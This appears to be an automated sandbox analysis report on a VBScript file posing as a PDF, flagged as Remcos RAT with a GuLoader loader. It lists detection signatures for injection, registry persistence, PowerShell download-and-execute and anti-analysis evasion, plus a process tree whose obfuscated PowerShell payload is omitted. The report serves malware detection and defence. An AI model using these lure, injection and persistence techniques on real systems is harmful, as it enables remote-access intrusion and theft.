Windows
Analysis Report
Scanned_22C-6e24090516030.pdf.vbs
Overview
General Information
Detection
Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7784, cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned_22C-6e24090516030.pdf.vbs", MD5: A47CBE969EA935BDD3AB568BB126BC80)
- PING.EXE (PID: 7912, cmdline: ping gormezl_6777.6777.6777.677e, MD5: 2F46799D79D22AC72C241EC0322B011D)
- conhost.exe (PID: 7920, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7972, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" followed by a very long obfuscated PowerShell script, which is truncated in the report and omitted here)